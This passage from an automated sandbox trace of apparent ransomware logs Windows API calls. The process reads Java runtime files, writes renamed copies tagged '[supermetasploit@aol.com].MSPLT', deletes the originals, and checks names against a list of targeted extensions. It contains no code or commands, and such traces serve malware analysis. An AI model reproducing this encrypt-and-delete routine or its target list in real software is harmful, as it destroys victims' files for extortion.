out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xcb0, lpOverlapped=0x0) returned 1 [0297.998] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.998] WriteFile (in: hFile=0x47c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe6, lpOverlapped=0x0) returned 1 [0297.999] SetEndOfFile (hFile=0x47c) returned 1 [0297.999] CloseHandle (hObject=0x47c) returned 1 [0298.003] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.003] SetEndOfFile (hFile=0x378) returned 1 [0298.010] CloseHandle (hObject=0x378) returned 1 [0298.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.011] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright")) returned 1 [0298.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.015] lstrlenW (lpString=".doc") returned 4 [0298.015] lstrcmpiW (lpString1=".doc", lpString2="IGHT") returned -1 [0298.015] lstrlenW (lpString=".docx") returned 5 [0298.015] lstrcmpiW (lpString1=".docx", lpString2="RIGHT") returned -1 [0298.015] lstrlenW (lpString=".pdf") returned 4 [0298.015] lstrcmpiW (lpString1=".pdf", lpString2="IGHT") returned -1 [0298.015] lstrlenW (lpString=".xls") returned 4 [0298.015] lstrcmpiW (lpString1=".xls", lpString2="IGHT") returned -1 [0298.015] lstrlenW (lpString=".xlsx") returned 5 [0298.015] lstrcmpiW (lpString1=".xlsx", lpString2="RIGHT") returned -1 [0298.015] lstrlenW (lpString=".ppt") returned 4 [0298.015] lstrcmpiW (lpString1=".ppt", lpString2="IGHT") returned -1 [0298.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.015] lstrlenW (lpString=".zip") returned 4 [0298.015] lstrcmpiW (lpString1=".zip", lpString2="IGHT") returned -1 [0298.015] lstrlenW (lpString=".rar") returned 4 [0298.016] lstrcmpiW (lpString1=".rar", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString=".bz2") returned 4 [0298.016] lstrcmpiW (lpString1=".bz2", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString=".7z") returned 3 [0298.016] lstrcmpiW (lpString1=".7z", lpString2="GHT") returned -1 [0298.016] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.016] lstrlenW (lpString=".dbf") returned 4 [0298.016] lstrcmpiW (lpString1=".dbf", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.016] lstrlenW (lpString=".1cd") returned 4 [0298.016] lstrcmpiW (lpString1=".1cd", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.016] lstrlenW (lpString=".jpg") returned 4 [0298.016] lstrcmpiW (lpString1=".jpg", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.016] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.016] lstrlenW (lpString=".doc") returned 4 [0298.016] lstrcmpiW (lpString1=".doc", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString=".docx") returned 5 [0298.016] lstrcmpiW (lpString1=".docx", lpString2="RIGHT") returned -1 [0298.016] lstrlenW (lpString=".pdf") returned 4 [0298.016] lstrcmpiW (lpString1=".pdf", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString=".xls") returned 4 [0298.016] lstrcmpiW (lpString1=".xls", lpString2="IGHT") returned -1 [0298.016] lstrlenW (lpString=".xlsx") returned 5 [0298.017] lstrcmpiW (lpString1=".xlsx", lpString2="RIGHT") returned -1 [0298.017] lstrlenW (lpString=".ppt") returned 4 [0298.017] lstrcmpiW (lpString1=".ppt", lpString2="IGHT") returned -1 [0298.017] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.017] lstrlenW (lpString=".zip") returned 4 [0298.017] lstrcmpiW (lpString1=".zip", lpString2="IGHT") returned -1 [0298.017] lstrlenW (lpString=".rar") returned 4 [0298.017] lstrcmpiW (lpString1=".rar", lpString2="IGHT") returned -1 [0298.017] lstrlenW (lpString=".bz2") returned 4 [0298.017] lstrcmpiW (lpString1=".bz2", lpString2="IGHT") returned -1 [0298.017] lstrlenW (lpString=".7z") returned 3 [0298.017] lstrcmpiW (lpString1=".7z", lpString2="GHT") returned -1 [0298.017] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.017] lstrlenW (lpString=".dbf") returned 4 [0298.017] lstrcmpiW (lpString1=".dbf", lpString2="IGHT") returned -1 [0298.017] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.017] lstrlenW (lpString=".1cd") returned 4 [0298.017] lstrcmpiW (lpString1=".1cd", lpString2="IGHT") returned -1 [0298.017] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT") returned 44 [0298.017] lstrlenW (lpString=".jpg") returned 4 [0298.017] lstrcmpiW (lpString1=".jpg", lpString2="IGHT") returned -1 [0298.017] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0298.018] lstrlenW (lpString="accessibility.properties") returned 24 [0298.018] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.018] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=149) returned 1 [0298.019] CloseHandle (hObject=0x378) returned 1 [0298.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties")) returned 0x20 [0298.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.019] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.020] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.020] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.020] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0298.427] GetLastError () returned 0x0 [0298.427] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x95, lpOverlapped=0x0) returned 1 [0298.429] WriteFile (in: hFile=0x47c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xa0, lpOverlapped=0x0) returned 1 [0298.430] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.430] WriteFile (in: hFile=0x47c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x104, lpOverlapped=0x0) returned 1 [0298.430] SetEndOfFile (hFile=0x47c) returned 1 [0298.441] CloseHandle (hObject=0x47c) returned 1 [0298.442] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.442] SetEndOfFile (hFile=0x378) returned 1 [0298.473] CloseHandle (hObject=0x378) returned 1 [0298.473] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.473] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties")) returned 1 [0298.474] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.474] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.474] lstrlenW (lpString=".doc") returned 4 [0298.474] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0298.474] lstrlenW (lpString=".docx") returned 5 [0298.474] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0298.474] lstrlenW (lpString=".pdf") returned 4 [0298.475] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString=".xls") returned 4 [0298.475] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString=".xlsx") returned 5 [0298.475] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0298.475] lstrlenW (lpString=".ppt") returned 4 [0298.475] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.475] lstrlenW (lpString=".zip") returned 4 [0298.475] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString=".rar") returned 4 [0298.475] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString=".bz2") returned 4 [0298.475] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString=".7z") returned 3 [0298.475] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0298.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.475] lstrlenW (lpString=".dbf") returned 4 [0298.475] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.475] lstrlenW (lpString=".1cd") returned 4 [0298.475] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.475] lstrlenW (lpString=".jpg") returned 4 [0298.475] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0298.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.476] lstrlenW (lpString=".doc") returned 4 [0298.476] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString=".docx") returned 5 [0298.476] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0298.476] lstrlenW (lpString=".pdf") returned 4 [0298.476] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString=".xls") returned 4 [0298.476] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString=".xlsx") returned 5 [0298.476] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0298.476] lstrlenW (lpString=".ppt") returned 4 [0298.476] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.476] lstrlenW (lpString=".zip") returned 4 [0298.476] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString=".rar") returned 4 [0298.476] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString=".bz2") returned 4 [0298.476] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString=".7z") returned 3 [0298.476] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0298.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.476] lstrlenW (lpString=".dbf") returned 4 [0298.476] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0298.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.477] lstrlenW (lpString=".1cd") returned 4 [0298.477] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0298.477] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0298.477] lstrlenW (lpString=".jpg") returned 4 [0298.477] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0298.477] lstrcmpiW (lpString1=".pf", lpString2=".MSPLT") returned 1 [0298.477] lstrlenW (lpString="GRAY.pf") returned 7 [0298.477] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.478] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=632) returned 1 [0298.478] CloseHandle (hObject=0x378) returned 1 [0298.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf")) returned 0x20 [0298.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.478] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.478] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.479] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.479] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0298.583] GetLastError () returned 0x0 [0298.583] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x278, lpOverlapped=0x0) returned 1 [0298.585] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x280, lpOverlapped=0x0) returned 1 [0298.586] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.586] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe2, lpOverlapped=0x0) returned 1 [0298.586] SetEndOfFile (hFile=0x4c0) returned 1 [0298.586] CloseHandle (hObject=0x4c0) returned 1 [0298.594] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.594] SetEndOfFile (hFile=0x378) returned 1 [0298.597] CloseHandle (hObject=0x378) returned 1 [0298.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.598] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf")) returned 1 [0298.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.599] lstrlenW (lpString=".doc") returned 4 [0298.599] lstrcmpiW (lpString1=".doc", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString=".docx") returned 5 [0298.599] lstrcmpiW (lpString1=".docx", lpString2="AY.pf") returned -1 [0298.599] lstrlenW (lpString=".pdf") returned 4 [0298.599] lstrcmpiW (lpString1=".pdf", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString=".xls") returned 4 [0298.599] lstrcmpiW (lpString1=".xls", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString=".xlsx") returned 5 [0298.599] lstrcmpiW (lpString1=".xlsx", lpString2="AY.pf") returned -1 [0298.599] lstrlenW (lpString=".ppt") returned 4 [0298.599] lstrcmpiW (lpString1=".ppt", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.599] lstrlenW (lpString=".zip") returned 4 [0298.599] lstrcmpiW (lpString1=".zip", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString=".rar") returned 4 [0298.599] lstrcmpiW (lpString1=".rar", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString=".bz2") returned 4 [0298.599] lstrcmpiW (lpString1=".bz2", lpString2="Y.pf") returned -1 [0298.599] lstrlenW (lpString=".7z") returned 3 [0298.599] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.599] lstrlenW (lpString=".dbf") returned 4 [0298.599] lstrcmpiW (lpString1=".dbf", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.600] lstrlenW (lpString=".1cd") returned 4 [0298.600] lstrcmpiW (lpString1=".1cd", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.600] lstrlenW (lpString=".jpg") returned 4 [0298.600] lstrcmpiW (lpString1=".jpg", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.600] lstrlenW (lpString=".doc") returned 4 [0298.600] lstrcmpiW (lpString1=".doc", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString=".docx") returned 5 [0298.600] lstrcmpiW (lpString1=".docx", lpString2="AY.pf") returned -1 [0298.600] lstrlenW (lpString=".pdf") returned 4 [0298.600] lstrcmpiW (lpString1=".pdf", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString=".xls") returned 4 [0298.600] lstrcmpiW (lpString1=".xls", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString=".xlsx") returned 5 [0298.600] lstrcmpiW (lpString1=".xlsx", lpString2="AY.pf") returned -1 [0298.600] lstrlenW (lpString=".ppt") returned 4 [0298.600] lstrcmpiW (lpString1=".ppt", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.600] lstrlenW (lpString=".zip") returned 4 [0298.600] lstrcmpiW (lpString1=".zip", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString=".rar") returned 4 [0298.600] lstrcmpiW (lpString1=".rar", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString=".bz2") returned 4 [0298.600] lstrcmpiW (lpString1=".bz2", lpString2="Y.pf") returned -1 [0298.600] lstrlenW (lpString=".7z") returned 3 [0298.600] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.600] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.600] lstrlenW (lpString=".dbf") returned 4 [0298.601] lstrcmpiW (lpString1=".dbf", lpString2="Y.pf") returned -1 [0298.601] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.601] lstrlenW (lpString=".1cd") returned 4 [0298.601] lstrcmpiW (lpString1=".1cd", lpString2="Y.pf") returned -1 [0298.601] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0298.601] lstrlenW (lpString=".jpg") returned 4 [0298.601] lstrcmpiW (lpString1=".jpg", lpString2="Y.pf") returned -1 [0298.601] lstrcmpiW (lpString1=".pf", lpString2=".MSPLT") returned 1 [0298.601] lstrlenW (lpString="PYCC.pf") returned 7 [0298.601] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.601] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=274474) returned 1 [0298.602] CloseHandle (hObject=0x378) returned 1 [0298.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf")) returned 0x20 [0298.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.602] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.602] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.602] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.602] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0298.603] GetLastError () returned 0x0 [0298.603] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x4302a, lpOverlapped=0x0) returned 1 [0298.725] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x43030, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x43030, lpOverlapped=0x0) returned 1 [0298.737] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.737] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe2, lpOverlapped=0x0) returned 1 [0298.737] SetEndOfFile (hFile=0x4c0) returned 1 [0298.737] CloseHandle (hObject=0x4c0) returned 1 [0298.745] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.745] SetEndOfFile (hFile=0x378) returned 1 [0298.757] CloseHandle (hObject=0x378) returned 1 [0298.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0298.758] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf")) returned 1 [0298.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.759] lstrlenW 